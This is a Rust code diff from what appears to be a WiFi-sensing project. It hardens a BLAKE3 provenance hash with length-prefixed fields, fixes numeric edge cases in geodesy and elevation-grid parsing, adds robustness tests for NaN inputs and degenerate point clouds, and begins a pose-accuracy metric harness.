h.update(&(bytes.len() as u64).to_le_bytes());
|
||||
h.update(bytes);
|
||||
}
|
||||
|
||||
/// Deterministic BLAKE3 witness over a trust decision: the provenance tuple
|
||||
/// (evidence ‖ model ‖ calibration ‖ privacy decision) plus the effective
|
||||
/// privacy-class byte. Stable across runs for identical decisions — the
|
||||
/// "signed operational belief" fingerprint (ADR-137 §2.7 / ADR-028).
|
||||
///
|
||||
/// # Witness integrity (review finding: domain separation)
|
||||
/// Every privacy-relevant field is **length-prefixed** before hashing, and the
|
||||
/// (variable-length) evidence list is preceded by an explicit count. Without
|
||||
/// this framing the fields were concatenated boundary-to-boundary, so a string
|
||||
/// straddling a field boundary (e.g. an adapter id absorbing the leading bytes
|
||||
/// of the calibration epoch, or a model_version absorbing a trailing evidence
|
||||
/// ref) collided with a *different* trust decision — silently un-distinguishing
|
||||
/// two distinct privacy-relevant inputs and defeating the tamper/drift audit.
|
||||
/// `model_version` is operator-influenceable (per-room adapter id, ADR-150
|
||||
/// §3.4), so the ambiguity was reachable, not merely theoretical.
|
||||
fn witness_of(p: &SemanticProvenance, class: PrivacyClass) -> [u8; 32] {
|
||||
let mut h = blake3::Hasher::new();
|
||||
h.update(WITNESS_DOMAIN);
|
||||
// Explicit evidence count, then each ref length-prefixed: the number of
|
||||
// evidence refs is itself privacy-relevant and must be unambiguous.
|
||||
h.update(&(p.evidence.len() as u64).to_le_bytes());
|
||||
for e in &p.evidence {
|
||||
- h.update(e.as_bytes());
|
||||
- h.update(b"\x1f");
|
||||
+ witness_field(&mut h, e.as_bytes());
|
||||
}
|
||||
- h.update(p.model_version.as_bytes());
|
||||
- h.update(p.calibration_version.as_bytes());
|
||||
- h.update(p.privacy_decision.as_bytes());
|
||||
+ witness_field(&mut h, p.model_version.as_bytes());
|
||||
+ witness_field(&mut h, p.calibration_version.as_bytes());
|
||||
+ witness_field(&mut h, p.privacy_decision.as_bytes());
|
||||
h.update(&[class.as_u8()]);
|
||||
*h.finalize().as_bytes()
|
||||
}
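The framing argument can be checked without a hash function, because two inputs collide under any hash exactly when their preimages are identical. The sketch below builds the preimage both ways: the earlier separator-only concatenation and the length-prefixed form. `frame_field`, `framed_preimage`, and `naive_preimage` are hypothetical helpers written for this illustration; they mirror the shape of `witness_field` and `witness_of` but omit the domain tag, the privacy decision, and the class byte.

```rust
/// Append one field with an 8-byte little-endian length prefix.
fn frame_field(out: &mut Vec<u8>, bytes: &[u8]) {
    out.extend_from_slice(&(bytes.len() as u64).to_le_bytes());
    out.extend_from_slice(bytes);
}

/// Length-prefixed preimage: explicit evidence count, then framed fields.
fn framed_preimage(evidence: &[&str], model: &str, calibration: &str) -> Vec<u8> {
    let mut out = Vec::new();
    out.extend_from_slice(&(evidence.len() as u64).to_le_bytes());
    for e in evidence {
        frame_field(&mut out, e.as_bytes());
    }
    frame_field(&mut out, model.as_bytes());
    frame_field(&mut out, calibration.as_bytes());
    out
}

/// Earlier style: evidence refs end in 0x1f, remaining fields are simply appended.
fn naive_preimage(evidence: &[&str], model: &str, calibration: &str) -> Vec<u8> {
    let mut out = Vec::new();
    for e in evidence {
        out.extend_from_slice(e.as_bytes());
        out.push(0x1f);
    }
    out.extend_from_slice(model.as_bytes());
    out.extend_from_slice(calibration.as_bytes());
    out
}
```

With the length prefix, a decoder reading the preimage left to right always knows where each field ends, so two different field tuples cannot serialize to the same bytes.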
|
||||
@@ -1113,4 +1171,179 @@ mod tests {
|
||||
// StrictNoIdentity base = Restricted, even with no contradiction.
|
||||
assert_eq!(out.effective_class, PrivacyClass::Restricted);
|
||||
}
|
||||
|
||||
/// De-magic pin (review finding): the named engine constants must keep
|
||||
/// their prior inline values exactly, so the de-magic is a pure rename with
|
||||
/// no behavior change.
|
||||
#[test]
|
||||
fn engine_constants_match_prior_values() {
|
||||
assert_eq!(StreamingEngine::DEFAULT_COHERENCE_ACCEPT, 0.85);
|
||||
assert_eq!(StreamingEngine::SLAM_ASSOC_RADIUS_M, 0.5);
|
||||
assert_eq!(StreamingEngine::SLAM_MIN_SIGHTINGS, 5);
|
||||
assert_eq!(StreamingEngine::SLAM_MIN_COHERENCE, 0.6);
|
||||
assert_eq!(StreamingEngine::ANCHOR_WALL_CEILING, 0.05);
|
||||
assert_eq!(StreamingEngine::ANCHOR_MOBILE_FLOOR, 1.0);
|
||||
}
|
||||
|
||||
/// Privacy monotonicity (the crux): across EVERY base mode, a forced
|
||||
/// contradiction may only ever make the emitted class *more* restrictive
|
||||
/// (higher byte) and never less. Demotion is single-step and clamps at
|
||||
/// Restricted; a clean cycle emits exactly the base class. This is the
|
||||
/// information-only-removed invariant of ADR-141/120 stated as a property
|
||||
/// over the whole mode set.
|
||||
#[test]
|
||||
fn forced_contradiction_never_relaxes_class() {
|
||||
let cal_mismatch = [Some(CalibrationId(1)), Some(CalibrationId(2))]; // disagree → contradiction
|
||||
let cal_match = [Some(CalibrationId(5)), Some(CalibrationId(5))];
|
||||
let frames = [node_frame(0, 1000, 56), node_frame(1, 1001, 56)];
|
||||
for mode in [
|
||||
PrivacyMode::RawResearch,
|
||||
PrivacyMode::PrivateHome,
|
||||
PrivacyMode::EnterpriseAnonymous,
|
||||
PrivacyMode::CareWithConsent,
|
||||
PrivacyMode::StrictNoIdentity,
|
||||
] {
|
||||
let base_class = mode.target_class();
|
||||
|
||||
// Clean cycle: emits exactly the base class (no relaxation upward).
|
||||
let mut clean = StreamingEngine::new(mode, 1, GeoRegistration::default());
|
||||
let room_c = clean.add_room("r", "R");
|
||||
let oc = clean
|
||||
.process_cycle_calibrated(&frames, &cal_match, room_c, 1)
|
||||
.unwrap();
|
||||
assert_eq!(oc.effective_class, base_class, "clean cycle == base class");
|
||||
assert!(!oc.demoted);
|
||||
|
||||
// Forced contradiction: class byte only ever increases (more
|
||||
// restrictive), never decreases below the base.
|
||||
let mut dirty = StreamingEngine::new(mode, 1, GeoRegistration::default());
|
||||
let room_d = dirty.add_room("r", "R");
|
||||
let od = dirty
|
||||
.process_cycle_calibrated(&frames, &cal_mismatch, room_d, 1)
|
||||
.unwrap();
|
||||
assert!(od.demoted, "calibration mismatch must demote in {mode:?}");
|
||||
assert!(
|
||||
od.effective_class.as_u8() >= base_class.as_u8(),
|
||||
"demotion must never relax: {mode:?} base={:?} got={:?}",
|
||||
base_class,
|
||||
od.effective_class
|
||||
);
|
||||
// And it must be strictly more restrictive unless already clamped
|
||||
// at the most-restrictive class.
|
||||
if base_class != PrivacyClass::Restricted {
|
||||
assert!(
|
||||
od.effective_class.as_u8() > base_class.as_u8(),
|
||||
"unclamped demotion must increase restriction in {mode:?}"
|
||||
);
|
||||
} else {
|
||||
assert_eq!(od.effective_class, PrivacyClass::Restricted);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Fail-closed boundary: an empty cycle (zero frames) must NOT emit a
|
||||
/// trusted output at all — fusion rejects it and the engine surfaces a
|
||||
/// hard error. There is no degenerate output that could carry a stale or
|
||||
/// over-permissive class.
|
||||
#[test]
|
||||
fn empty_cycle_fails_closed() {
|
||||
let (mut e, room) = engine();
|
||||
let err = e.process_cycle(&[], CalibrationId(1), room, 1);
|
||||
assert!(matches!(err, Err(EngineError::Fusion(_))), "empty cycle must error, got {err:?}");
|
||||
// No SemanticState was appended (room + sensor only).
|
||||
assert_eq!(e.world().node_count(), 2);
|
||||
assert_eq!(e.cycle_count(), 0, "a failed cycle must not advance the counter");
|
||||
}
|
||||
|
||||
/// Single-node boundary characterization: a one-node cycle fuses (no
|
||||
/// multistatic cross-check is possible), reports no mesh (n<2), and emits a
|
||||
/// well-formed witness at the base class. Documents that single-node sensing
|
||||
/// is a valid, non-demoting mode — not a silent bypass.
|
||||
#[test]
|
||||
fn single_node_cycle_is_well_formed() {
|
||||
let (mut e, room) = engine();
|
||||
let out = e
|
||||
.process_cycle(&[node_frame(0, 1000, 56)], CalibrationId(1), room, 1)
|
||||
.unwrap();
|
||||
assert!(out.mesh.is_none(), "one node has no mesh cut");
|
||||
assert!(out.directional.is_none(), "no geometry registered");
|
||||
assert_eq!(out.effective_class, PrivacyClass::Anonymous); // PrivateHome base
|
||||
assert_ne!(out.witness, [0u8; 32], "witness still emitted");
|
||||
}
|
||||
|
||||
/// Witness domain-separation (review finding): the witness must change
|
||||
/// whenever ANY privacy-relevant field changes. The model_version,
|
||||
/// calibration_version, and privacy_decision fields are concatenated into
|
||||
/// the hash; without an unambiguous delimiter between them, a string that
|
||||
/// straddles the model/calibration boundary collides with a different
|
||||
/// (model, calibration) tuple.
|
||||
///
|
||||
/// `model_version` is operator-influenceable through the per-room adapter id
|
||||
/// (ADR-150 §3.4), and `calibration_version` is `cal:<hex>` — so the two
|
||||
/// provenances below are *both reachable* and represent genuinely different
|
||||
/// trust decisions (different model identity, different calibration epoch),
|
||||
/// yet the field-boundary ambiguity makes them hash-collide. A colliding
|
||||
/// witness silently un-distinguishes two distinct privacy-relevant inputs,
|
||||
/// defeating the tamper/drift audit guarantee.
|
||||
#[test]
|
||||
fn witness_distinguishes_model_calibration_boundary() {
|
||||
let class = PrivacyClass::Anonymous;
|
||||
// A: model "rfenc-v1+adapter:X", calibration epoch "cal:00ab".
|
||||
let a = SemanticProvenance {
|
||||
evidence: vec!["ev".into()],
|
||||
model_version: "rfenc-v1+adapter:X".into(),
|
||||
calibration_version: "cal:00ab".into(),
|
||||
privacy_decision: "PrivateHome/Anonymous".into(),
|
||||
};
|
||||
// B: adapter id absorbs the leading "cal:00a" of A's calibration; B's
|
||||
// own calibration is the remaining "b". A.model‖A.cal == B.model‖B.cal,
|
||||
// so the unseparated concatenation hashes identically — yet these are
|
||||
// distinct (model identity, calibration epoch) tuples.
|
||||
let b = SemanticProvenance {
|
||||
evidence: vec!["ev".into()],
|
||||
model_version: "rfenc-v1+adapter:Xcal:00a".into(),
|
||||
calibration_version: "b".into(),
|
||||
privacy_decision: "PrivateHome/Anonymous".into(),
|
||||
};
|
||||
assert_ne!(a.model_version, b.model_version);
|
||||
assert_ne!(a.calibration_version, b.calibration_version);
|
||||
// Sanity: the two collide under naive concatenation.
|
||||
assert_eq!(
|
||||
format!("{}{}", a.model_version, a.calibration_version),
|
||||
format!("{}{}", b.model_version, b.calibration_version),
|
||||
);
|
||||
assert_ne!(
|
||||
witness_of(&a, class),
|
||||
witness_of(&b, class),
|
||||
"distinct (model, calibration) tuples must not share a witness"
|
||||
);
|
||||
}
|
||||
|
||||
/// Witness domain-separation across the evidence/model boundary: a witness
|
||||
/// must distinguish an extra evidence ref from a model_version that absorbs
|
||||
/// the same bytes. Pre-fix, the evidence loop terminated each ref with one 0x1f separator;
|
||||
/// the model field must itself be unambiguously delimited from the (variable
|
||||
/// number of) evidence refs that precede it.
|
||||
#[test]
|
||||
fn witness_distinguishes_evidence_model_boundary() {
|
||||
let class = PrivacyClass::Anonymous;
|
||||
let a = SemanticProvenance {
|
||||
evidence: vec!["e1".into(), "e2".into()],
|
||||
model_version: "m".into(),
|
||||
calibration_version: "cal:1".into(),
|
||||
privacy_decision: "PrivateHome/Anonymous".into(),
|
||||
};
|
||||
let b = SemanticProvenance {
|
||||
evidence: vec!["e1".into()],
|
||||
// absorbs "e2" + its 0x1f separator into the model field.
|
||||
model_version: "e2\u{1f}m".into(),
|
||||
calibration_version: "cal:1".into(),
|
||||
privacy_decision: "PrivateHome/Anonymous".into(),
|
||||
};
|
||||
assert_ne!(
|
||||
witness_of(&a, class),
|
||||
witness_of(&b, class),
|
||||
"an extra evidence ref must not collide with a model_version that absorbs it"
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
@@ -15,7 +15,11 @@ pub fn haversine(a: &GeoPoint, b: &GeoPoint) -> f64 {
|
||||
let lat1 = a.lat.to_radians();
|
||||
let lat2 = b.lat.to_radians();
|
||||
let h = (dlat / 2.0).sin().powi(2) + lat1.cos() * lat2.cos() * (dlon / 2.0).sin().powi(2);
|
||||
- 2.0 * WGS84_A * h.sqrt().asin()
|
||||
+ // `asin` is only defined on [-1, 1]. For (near-)antipodal points floating
|
||||
+ // rounding can push `h.sqrt()` to 1.0 + epsilon, and `asin(>1)` is NaN —
|
||||
+ // which would silently poison any distance-based comparison downstream.
|
||||
+ // Clamp into domain so the result is always a finite distance.
|
||||
+ 2.0 * WGS84_A * h.sqrt().clamp(0.0, 1.0).asin()
|
||||
}
|
||||
|
||||
/// WGS84 to local ENU (East-North-Up) relative to origin, in meters.
|
||||
@@ -83,3 +87,73 @@ pub fn tiles_for_bbox(bbox: &GeoBBox, zoom: u8) -> Vec<TileCoord> {
|
||||
}
|
||||
tiles
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
// ── haversine asin-domain robustness ───────────────────────────────────
|
||||
//
|
||||
// For (near-)antipodal points, floating rounding can push the haversine
|
||||
// term `h` to 1.0 + ~4e-16, and `asin(sqrt(h)) = asin(>1)` is NaN. A NaN
|
||||
// distance silently breaks every downstream comparison (all `<`/`>` become
|
||||
// false), so the result must stay finite. This exact pair produced
|
||||
// h = 1.0000000000000004 pre-fix (verified empirically).
|
||||
|
||||
#[test]
|
||||
fn haversine_near_antipodal_is_finite_not_nan() {
|
||||
let a = GeoPoint {
|
||||
lat: -44.4994,
|
||||
lon: -178.957_22,
|
||||
alt: 0.0,
|
||||
};
|
||||
let b = GeoPoint {
|
||||
lat: 44.499_399_99,
|
||||
lon: 1.042_780_01,
|
||||
alt: 0.0,
|
||||
};
|
||||
let d = haversine(&a, &b);
|
||||
assert!(d.is_finite(), "near-antipodal haversine must be finite, got {d}");
|
||||
// Half-circumference is ~20_037 km; result must be close to that.
|
||||
assert!(
|
||||
(19_000_000.0..21_000_000.0).contains(&d),
|
||||
"antipodal distance should be ~half-circumference, got {d}"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn haversine_identical_points_is_zero() {
|
||||
let p = GeoPoint {
|
||||
lat: 43.65,
|
||||
lon: -79.38,
|
||||
alt: 0.0,
|
||||
};
|
||||
let d = haversine(&p, &p);
|
||||
assert!(d.is_finite() && d < 1e-6, "identical points → 0, got {d}");
|
||||
}
|
||||
|
||||
// ── pole-singularity robustness (degenerate geometry) ──────────────────
|
||||
//
|
||||
// The ENU transforms divide by cos(lat); at the poles cos(±90°) = 0, so
|
||||
// the longitude term is non-finite. We do not change the transform (that
|
||||
// would alter near-pole results), but we pin that the call does NOT panic.
|
||||
|
||||
#[test]
|
||||
fn wgs84_to_enu_at_pole_does_not_panic() {
|
||||
let origin = GeoPoint {
|
||||
lat: 90.0,
|
||||
lon: 0.0,
|
||||
alt: 0.0,
|
||||
};
|
||||
let point = GeoPoint {
|
||||
lat: 89.99,
|
||||
lon: 10.0,
|
||||
alt: 0.0,
|
||||
};
|
||||
// Must return without panicking. North/up stay finite; east may be
|
||||
// non-finite at the exact pole — assert the bounded components only.
|
||||
let enu = wgs84_to_enu(&point, &origin);
|
||||
assert!(enu[1].is_finite(), "north component must be finite");
|
||||
assert!(enu[2].is_finite(), "up component must be finite");
|
||||
}
|
||||
}
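The `asin` domain issue behind the haversine fix can be reproduced in isolation. The sketch below is a standalone version of the clamped formula that takes plain degrees instead of `GeoPoint`. `haversine_m` and `EARTH_RADIUS_M` are names invented here, and the radius is assumed to equal the crate's `WGS84_A` (the WGS84 semi-major axis, 6 378 137 m).

```rust
/// ASSUMPTION: WGS84 semi-major axis in meters, taken to match `WGS84_A`.
const EARTH_RADIUS_M: f64 = 6_378_137.0;

/// Great-circle distance in meters between two lat/lon points given in degrees.
fn haversine_m(lat1_deg: f64, lon1_deg: f64, lat2_deg: f64, lon2_deg: f64) -> f64 {
    let lat1 = lat1_deg.to_radians();
    let lat2 = lat2_deg.to_radians();
    let dlat = lat2 - lat1;
    let dlon = (lon2_deg - lon1_deg).to_radians();
    let h = (dlat / 2.0).sin().powi(2)
        + lat1.cos() * lat2.cos() * (dlon / 2.0).sin().powi(2);
    // Rounding can leave sqrt(h) a hair above 1.0; asin of that is NaN,
    // so clamp into asin's domain before calling it.
    2.0 * EARTH_RADIUS_M * h.sqrt().clamp(0.0, 1.0).asin()
}
```

The clamp only changes results that would otherwise be NaN: for any in-domain value of `h.sqrt()` it returns the input unchanged.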
|
||||
|
||||
@@ -68,6 +68,21 @@ pub fn parse_hgt(data: &[u8], origin_lat: f64, origin_lon: f64) -> Result<Elevat
|
||||
let n_samples = data.len() / 2;
|
||||
let side = (n_samples as f64).sqrt() as usize;
|
||||
|
||||
// A valid SRTM grid is at least 2x2 — anything smaller has no cell spacing.
|
||||
// Without this guard, `side - 1` underflows (panic in debug, wraps to a
|
||||
// huge value in release) and `1.0 / (side - 1)` yields a garbage/inf
|
||||
// `cell_size_deg` that then poisons every `ElevationGrid::get` lookup. A
|
||||
// truncated download, a 404 HTML body, or an empty response can all reach
|
||||
// here, so fail loudly instead of corrupting the persisted grid.
|
||||
if side < 2 {
|
||||
anyhow::bail!(
|
||||
"HGT data too small: {} bytes ({} samples, side {}) — need at least a 2x2 grid",
|
||||
data.len(),
|
||||
n_samples,
|
||||
side
|
||||
);
|
||||
}
|
||||
|
||||
let heights: Vec<f32> = data
|
||||
.chunks_exact(2)
|
||||
.map(|c| {
|
||||
@@ -129,3 +144,42 @@ pub fn extract_subgrid(grid: &ElevationGrid, center: &GeoPoint, radius_m: f64) -
|
||||
heights,
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
// ── parse_hgt degenerate-input robustness ──────────────────────────────
|
||||
//
|
||||
// Before the `side < 2` guard, an empty or sub-2x2 buffer either made
|
||||
// `side - 1` underflow (side 0: panic in debug, huge wrap in release) or
|
||||
// made `1.0 / (side - 1)` divide by zero (side 1), yielding a garbage
|
||||
// `cell_size_deg`. A truncated download or a 404 HTML page can reach
|
||||
// `parse_hgt`, so these inputs must Err, not panic or poison the grid.
|
||||
|
||||
#[test]
|
||||
fn parse_hgt_empty_data_errors_not_panics() {
|
||||
let res = parse_hgt(&[], 40.0, -75.0);
|
||||
assert!(res.is_err(), "empty HGT must Err, got {res:?}");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn parse_hgt_single_sample_errors() {
|
||||
// 2 bytes = 1 sample → side 1 → div-by-zero cell_size (inf) pre-fix.
|
||||
let res = parse_hgt(&[0u8, 0u8], 40.0, -75.0);
|
||||
assert!(res.is_err(), "1-sample HGT must Err, got {res:?}");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn parse_hgt_minimal_2x2_is_finite() {
|
||||
// 4 samples = 8 bytes → side 2 → cell_size = 1.0 (finite, valid).
|
||||
let data = vec![0u8; 8];
|
||||
let grid = parse_hgt(&data, 40.0, -75.0).expect("2x2 HGT should parse");
|
||||
assert_eq!(grid.cols, 2);
|
||||
assert_eq!(grid.rows, 2);
|
||||
assert!(
|
||||
grid.cell_size_deg.is_finite() && grid.cell_size_deg > 0.0,
|
||||
"cell_size must be finite positive, got {}",
|
||||
grid.cell_size_deg
|
||||
);
|
||||
}
|
||||
}
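The effect of the `side < 2` guard on the cell-size computation can be shown with the arithmetic alone. This is a sketch under stated assumptions: `grid_geometry` is a hypothetical helper that returns a `String` error instead of the `anyhow` error used by `parse_hgt`, and it assumes the cell size is `1.0 / (side - 1)` degrees, as the comments above describe.

```rust
/// Derive (side, cell_size_deg) for a square grid of 2-byte samples.
/// Hypothetical helper; `parse_hgt` itself also decodes the heights.
fn grid_geometry(data_len: usize) -> Result<(usize, f64), String> {
    let n_samples = data_len / 2;
    let side = (n_samples as f64).sqrt() as usize;
    if side < 2 {
        // side 0 would underflow `side - 1`; side 1 would divide by zero.
        return Err(format!(
            "HGT data too small: {} bytes ({} samples, side {})",
            data_len, n_samples, side
        ));
    }
    // Safe: side >= 2, so side - 1 >= 1.
    Ok((side, 1.0 / (side - 1) as f64))
}
```

Rejecting the input up front keeps the subtraction and the division unconditional in the success path, so no later lookup has to re-check the cell size.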
|
||||
|
||||
@@ -700,4 +700,79 @@ mod tests {
|
||||
assert!(conf > 0.7, "self-similarity should exceed match threshold");
|
||||
}
|
||||
}
|
||||
|
||||
// ── NaN-state-poisoning guard (the proven recurring bug class) ──────────
|
||||
//
|
||||
// The calibration/vitals crates were both bitten by a single non-finite
|
||||
// sample latching into persistent state and freezing all outputs forever.
|
||||
// Here the auto-accumulating persistent state is `occupancy` (an EMA:
|
||||
// `*occ = *occ*0.7 + new*0.3`) and `vitals` (motion/breathing/heart).
|
||||
//
|
||||
// The UDP parser can only ever emit finite amplitudes/phases (sqrt and
|
||||
// atan2 of i8 values), so the realistic ingress is already safe. This test
|
||||
// is stronger: it injects an adversarial hand-built `CsiFrame` carrying
|
||||
// NaN/inf amplitudes and phases (possible because the fields are public),
|
||||
// and pins that the persistent state self-heals to finite values rather
|
||||
// than latching NaN and silently freezing — i.e. the bug class is absent.
|
||||
#[test]
|
||||
fn nonfinite_frame_does_not_poison_persistent_state() {
|
||||
let mut s = CsiPipelineState::default();
|
||||
// Warm up with valid frames so vitals/occupancy are populated.
|
||||
seed_state_with_frames(&mut s, 60);
|
||||
|
||||
// A valid baseline must be finite to start.
|
||||
assert!(s.occupancy.iter().all(|d| d.is_finite()));
|
||||
assert!(s.vitals.breathing_rate.is_finite());
|
||||
assert!(s.vitals.motion_score.is_finite());
|
||||
|
||||
// Inject a stream of poisoned frames: NaN/inf amplitudes + phases on a
|
||||
// valid header (node_id 1, finite rssi). Mimics a corrupt sensor.
|
||||
for i in 0..40 {
|
||||
let nan_frame = CsiFrame {
|
||||
node_id: 1,
|
||||
n_antennas: 1,
|
||||
n_subcarriers: 32,
|
||||
channel: 6,
|
||||
rssi: -50,
|
||||
noise_floor: -90,
|
||||
timestamp_us: 10_000 + i,
|
||||
iq_data: vec![0i8; 64],
|
||||
amplitudes: vec![f32::NAN; 32],
|
||||
phases: vec![f32::INFINITY; 32],
|
||||
};
|
||||
s.process_frame(nan_frame);
|
||||
}
|
||||
|
||||
// Persistent auto-accumulating state must remain finite — a single
|
||||
// poisoned frame (or 40) must not permanently corrupt outputs.
|
||||
assert!(
|
||||
s.occupancy.iter().all(|d| d.is_finite()),
|
||||
"occupancy EMA must not latch NaN/inf"
|
||||
);
|
||||
assert!(
|
||||
s.vitals.breathing_rate.is_finite(),
|
||||
"breathing_rate must stay finite, got {}",
|
||||
s.vitals.breathing_rate
|
||||
);
|
||||
assert!(
|
||||
s.vitals.heart_rate.is_finite(),
|
||||
"heart_rate must stay finite, got {}",
|
||||
s.vitals.heart_rate
|
||||
);
|
||||
assert!(
|
||||
s.vitals.motion_score.is_finite(),
|
||||
"motion_score must stay finite, got {}",
|
||||
s.vitals.motion_score
|
||||
);
|
||||
|
||||
// And the pipeline must recover: feeding valid frames again yields a
|
||||
// finite, in-range breathing estimate (not a frozen NaN).
|
||||
seed_state_with_frames(&mut s, 60);
|
||||
assert!(s.vitals.breathing_rate.is_finite());
|
||||
assert!(
|
||||
(0.0..=40.0).contains(&s.vitals.breathing_rate),
|
||||
"breathing must be in clamp range after recovery, got {}",
|
||||
s.vitals.breathing_rate
|
||||
);
|
||||
}
|
||||
}
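The state-poisoning class that this test guards against is easy to reproduce with a bare exponential moving average. The sketch below contrasts an unguarded update with one that refuses to latch a non-finite value. `Ema`, `update`, and `unguarded_update` are hypothetical names; the pipeline's actual guard is not shown in this diff and may be structured differently.

```rust
/// Unguarded EMA step, in the shape `occ = occ * 0.7 + new * 0.3`.
fn unguarded_update(prev: f32, sample: f32, alpha: f32) -> f32 {
    prev * (1.0 - alpha) + sample * alpha
}

/// EMA whose persistent state can never become NaN or infinite.
struct Ema {
    value: f32,
    alpha: f32,
}

impl Ema {
    fn new(alpha: f32) -> Self {
        Self { value: 0.0, alpha }
    }

    /// Fold in one sample; non-finite samples leave the state untouched.
    fn update(&mut self, sample: f32) -> f32 {
        if sample.is_finite() {
            let next = self.value * (1.0 - self.alpha) + sample * self.alpha;
            // Guard the state boundary as well as the input boundary.
            if next.is_finite() {
                self.value = next;
            }
        }
        self.value
    }
}
```

The unguarded form never recovers once a NaN enters, because NaN times any weight is still NaN. The guarded form simply holds its last good value until clean samples resume.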
|
||||
|
||||
@@ -184,4 +184,43 @@ mod tests {
|
||||
let fused = fuse_clouds(&[&a], 0.5);
|
||||
assert_eq!(fused.points.len(), 1, "three close points → one voxel");
|
||||
}
|
||||
|
||||
// ── degenerate-input robustness (no panic, sensible output) ────────────
|
||||
//
|
||||
// These pin that the voxel accumulators handle empty / single / all-
|
||||
// coincident inputs without dividing by zero or panicking. The per-voxel
|
||||
// count is always >= 1 (the entry is created on first insert), so the
|
||||
// `/n` averaging is safe — but make that contract explicit so a future
|
||||
// refactor cannot silently reintroduce a div-by-zero.
|
||||
|
||||
#[test]
|
||||
fn fuse_clouds_empty_input_is_empty() {
|
||||
let fused = fuse_clouds(&[], 0.1);
|
||||
assert!(fused.points.is_empty(), "no clouds → no points");
|
||||
let empty = PointCloud::new("empty");
|
||||
let fused2 = fuse_clouds(&[&empty], 0.1);
|
||||
assert!(fused2.points.is_empty(), "empty cloud → no points");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn fuse_clouds_single_point_is_finite() {
|
||||
let a = cloud_with("a", &[(1.0, 2.0, 3.0)]);
|
||||
let fused = fuse_clouds(&[&a], 0.1);
|
||||
assert_eq!(fused.points.len(), 1);
|
||||
let p = &fused.points[0];
|
||||
assert!(
|
||||
p.x.is_finite() && p.y.is_finite() && p.z.is_finite() && p.intensity.is_finite(),
|
||||
"single-point voxel must average to a finite point"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn fuse_clouds_all_coincident_collapses_finite() {
|
||||
// Many identical points → one voxel, finite averaged centroid.
|
||||
let a = cloud_with("a", &[(0.5, 0.5, 0.5); 100]);
|
||||
let fused = fuse_clouds(&[&a], 0.25);
|
||||
assert_eq!(fused.points.len(), 1, "coincident points → one voxel");
|
||||
let p = &fused.points[0];
|
||||
assert!((p.x - 0.5).abs() < 1e-4 && p.x.is_finite());
|
||||
}
|
||||
}
|
||||
|
||||
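The contract stated in the test comments above (a voxel entry is created on first insert, so its count is always at least 1 and the `/n` average cannot divide by zero) can be sketched as follows. This is a simplified stand-in, not the crate's `fuse_clouds`: the function name `voxel_average`, the tuple point type, and the floor-based voxel key are assumptions made for illustration.

```rust
use std::collections::HashMap;

/// Hypothetical voxel fusion: average all points that fall in the same voxel.
fn voxel_average(points: &[(f32, f32, f32)], voxel_size: f32) -> Vec<(f32, f32, f32)> {
    // voxel key -> (sum_x, sum_y, sum_z, count)
    let mut acc: HashMap<(i64, i64, i64), (f32, f32, f32, u32)> = HashMap::new();

    for &(x, y, z) in points {
        let key = (
            (x / voxel_size).floor() as i64,
            (y / voxel_size).floor() as i64,
            (z / voxel_size).floor() as i64,
        );
        // The entry only exists once a point has been inserted, and the count
        // is incremented in the same step, so count >= 1 for every stored voxel.
        let e = acc.entry(key).or_insert((0.0, 0.0, 0.0, 0));
        e.0 += x;
        e.1 += y;
        e.2 += z;
        e.3 += 1;
    }

    acc.into_values()
        .map(|(sx, sy, sz, n)| {
            let n = n as f32; // never 0, see above
            (sx / n, sy / n, sz / n)
        })
        .collect()
}
```

An empty input never creates an entry, so the output is empty and no division happens at all; that is the same shape the three degenerate-input tests pin for the real function.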
@@ -0,0 +1,708 @@
|
||||
//! Metric-locked pose-accuracy harness (ADR-155 §Tier-1.2; needs ADR slot 173).
|
||||
//!
|
||||
//! # Why this module exists
|
||||
//!
|
||||
//! Three PCK\@20 numbers float around this project and **cannot be lined up**
|
||||
//! because each silently uses a *different* PCK definition:
|
||||
//!
|
||||
//! | Number | Source | PCK normalization |
|
||||
//! |--------|--------|-------------------|
|
||||
//! | 96.09 % | WiFlow-STD reproduction | image / bounding-box normalized (looser) |
|
||||
//! | 81.63 % | AetherArena MM-Fi (ADR-150) | torso-diameter (standard MM-Fi / GraphPose-Fi) |
|
||||
//! | 61.1 % | GraphPose-Fi (preprint) | torso-diameter, 3D, mm-scale (harder) |
|
||||
//!
|
||||
//! The project was burned **twice** by metric ambiguity (a now-retracted "92.9 %
|
||||
//! PCK\@20" used *absolute* pixel thresholds, not torso normalization). The fix
|
||||
//! is to make the normalizer **explicit, selectable, and carried with every
|
||||
//! reported number** so an unlabeled PCK figure is structurally impossible.
|
||||
//!
|
||||
//! [`metrics_core`](crate::metrics_core) already pins the *canonical*
|
||||
//! torso-normalized PCK ([`pck_canonical`](crate::metrics_core::pck_canonical)).
|
||||
//! This module generalizes it to a [`PckNormalization`] enum covering all three
|
||||
//! conventions the SOTA brief names, adds [`mpjpe`] (mm), and bundles results
|
||||
//! into a self-describing [`PoseAccuracy`] struct. It **reuses** the
|
||||
//! `metrics_core` primitives (hip distance, bounding-box diagonal) — there is
|
||||
//! still exactly one implementation of each geometric reference.
|
||||
//!
|
||||
//! # This is measurement infrastructure, not an accuracy claim
|
||||
//!
|
||||
//! Nothing here asserts any project model is good. The unit tests prove the
|
||||
//! *harness* is arithmetically correct against hand-computed fixtures (no GPU,
|
||||
//! no datasets), including the key demonstration that the **same predictions
|
||||
//! score different PCK under the three normalizations** — proof the ambiguity is
|
||||
//! real and the definitions are genuinely distinct.
|
||||
//!
|
||||
//! # Literature
|
||||
//!
|
||||
//! - Torso-diameter PCK is the MM-Fi / GraphPose-Fi convention (Yang et al.,
|
||||
//! *GraphPose-Fi*, arXiv:2511.19105): a keypoint is correct iff its error is
|
||||
//! within `k · d_torso`, with `d_torso` the hip↔hip (or shoulder↔hip) span.
|
||||
//! - Bounding-box / image-normalized PCK is the WiFlow-STD-style looser
|
||||
//! convention (arXiv:2602.08661) — normalize by the GT pose bbox diagonal.
|
||||
